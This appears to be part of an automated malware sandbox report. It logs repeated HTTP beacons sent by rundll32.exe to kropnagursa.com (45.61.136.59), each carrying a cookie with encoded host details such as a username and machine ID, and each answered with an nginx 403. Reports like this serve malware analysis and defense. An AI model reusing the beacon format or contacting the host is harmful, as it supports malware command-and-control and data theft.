                                                                                                                                            Date: Thu, 02 Feb 2023 20:18:08 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            113192.168.2.44980945.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:18:09.218406916 CET2253OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:18:09.386594057 CET2253INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:18:09 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            114192.168.2.44981045.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:18:09.693608046 CET2254OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:18:09.859523058 CET2254INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:18:09 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            115192.168.2.44981145.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:18:10.165879965 CET2255OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:18:10.332652092 CET2256INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:18:10 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            116192.168.2.44981245.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:18:10.708220959 CET2257OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:18:10.875255108 CET2257INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:18:10 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            117192.168.2.44981345.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:18:11.196955919 CET2258OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:18:11.364187002 CET2258INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:18:11 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            118192.168.2.44981445.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:18:11.670592070 CET2259OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:18:11.836743116 CET2259INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:18:11 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            119192.168.2.44981545.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:18:12.258434057 CET2260OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:18:12.423394918 CET2261INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:18:12 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            12192.168.2.44970845.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:17:06.110502005 CET2123OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:17:06.278728008 CET2123INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:17:06 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            120192.168.2.44981645.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:18:12.954328060 CET2262OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:18:13.119558096 CET2262INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:18:13 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            121192.168.2.44981745.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:18:13.662795067 CET2263OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:18:13.827615976 CET2263INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:18:13 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            122192.168.2.44981845.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:18:14.344290018 CET2264OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:18:14.509875059 CET2264INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:18:14 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            123192.168.2.44981945.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:18:14.822953939 CET2265OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:18:14.987868071 CET2266INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:18:14 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            124192.168.2.44982045.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:18:15.534710884 CET2267OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:18:15.699664116 CET2267INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:18:15 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            125192.168.2.44982145.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:18:16.010406017 CET2268OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:18:16.175120115 CET2268INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:18:16 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            126192.168.2.44982245.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:18:16.494623899 CET2269OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:18:16.662159920 CET2270INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:18:16 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            127192.168.2.44982345.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:18:16.971476078 CET2270OUTGET / HTTP/1.1
